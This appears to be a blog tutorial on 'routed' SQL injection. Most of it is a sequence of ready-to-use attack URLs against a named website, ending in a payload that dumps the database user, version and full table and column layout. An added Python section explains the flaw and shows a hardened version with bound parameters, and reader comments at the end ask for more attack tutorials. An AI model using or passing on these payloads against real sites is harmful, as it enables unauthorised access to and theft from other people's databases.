Route SQL injection
TUTORIAL ROUTE SQL INJECTION BY VERSAILLES
Example target:
www.randyfath.com/food.php?id=6
As usual, we start with the first injection test:
www.randyfath.com/food.php?id=6'
And the result:
Now we check one step at a time to find where the error occurs.
www.randyfath.com/food.php?id=6+ORDER+BY+1--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+2--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+3--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+4--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+5--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+6--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+7--[error]
So the number of columns is 6.
OK, next we go straight to UNION SELECT:
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+1,2,3,4,5,6--
Huh, why is the result normal, without showing the magic number?
So we use the routed union approach, that is, we run ORDER BY again :p
BUT first we hex the quote mark to determine the location that will be routed. On this site the routing happens at number 1... not every site is the same. Read on:
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+1--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+2--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+3--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+4--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+5--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+6--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+7--',2,3,4,5,6--[error]
It turns out there are again 6 columns. OK, now we continue...
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+AND+0+UNION+SELECT+1,2,3,4,5,6--',2,3,4,5,6--
And ta-da.
OK, now we insert the DIOS:
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+AND+0+UNION+SELECT+1,2,concat('KAKATOJI',0x3c62723e,USER(),0x3c62723e,VERSION(),0x3c62723e,DATABASE(),0x3c62723e,(select (@x)from(select(@x:=0x00), (select(0)from (information_schema.columns)whe re(table_schema=database())and (0x00)in(@x:=concat +(@x,0x3c62723e,table_name,0x20 3a3a20,column_name))))x)),4,5,6--',2,3,4,5,6--
Greets:
- VERRY DARMAWAN
- ENGGAR
- LAMMER ELLITE
- ROMMY MAULANA
- CHEL PY
- REYVANDO ALIEF P
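The behaviour above (a plain UNION SELECT shows nothing, while a quoted value in one column does) is what happens when the page's output comes from a second query built from the first query's result. The following Python/sqlite3 sketch is an added example, not code from the original post or from the target site; it shows that pattern beside a version that binds parameters in both queries. The table names, the two-query page logic and all data are constructed assumptions.

```python
import sqlite3

def make_db():
    """In-memory database with constructed sample rows (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE food(id INTEGER, category TEXT, name TEXT);
        CREATE TABLE category(id TEXT, title TEXT);
        CREATE TABLE secrets(note TEXT);
        INSERT INTO food VALUES (6, '2', 'noodles');
        INSERT INTO category VALUES ('2', 'Main dishes');
        INSERT INTO secrets VALUES ('constructed-secret');
        -- A hostile value that is already stored in the database.
        INSERT INTO food VALUES (7, '0 UNION SELECT note FROM secrets', 'x');
    """)
    return db

def page_vulnerable(db, raw_id):
    """Hypothetical page logic: both queries are built by concatenation."""
    row = db.execute("SELECT category FROM food WHERE id = " + raw_id).fetchone()
    if row is None:
        return []
    # The first query's result is "routed" into a second statement as SQL text.
    second = "SELECT title FROM category WHERE id = " + str(row[0])
    return [r[0] for r in db.execute(second)]

def page_hardened(db, raw_id):
    """Same logic with input validation and bound parameters in BOTH queries."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []  # id must be a plain integer
    row = db.execute("SELECT category FROM food WHERE id = ?", (int(raw_id),)).fetchone()
    if row is None:
        return []
    # Values read back from the database are still untrusted: bind them too.
    rows = db.execute("SELECT title FROM category WHERE id = ?", (row[0],))
    return [r[0] for r in rows]

# Constructed input in the shape the tutorial uses: a quoted value in the
# first query's column that becomes SQL inside the second query.
ROUTED = "0 UNION SELECT '0 UNION SELECT note FROM secrets'"

if __name__ == "__main__":
    db = make_db()
    for raw in ("6", ROUTED, "7"):
        print(repr(raw), page_vulnerable(db, raw), page_hardened(db, raw))
```

The row with id 7 shows why validating the request parameter alone is not enough: the second query has to bind whatever the first one returns.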
Bro, a tutorial on how to do SQL Thunder please
I want to be able to do thunder
Whoa, turns out someone commented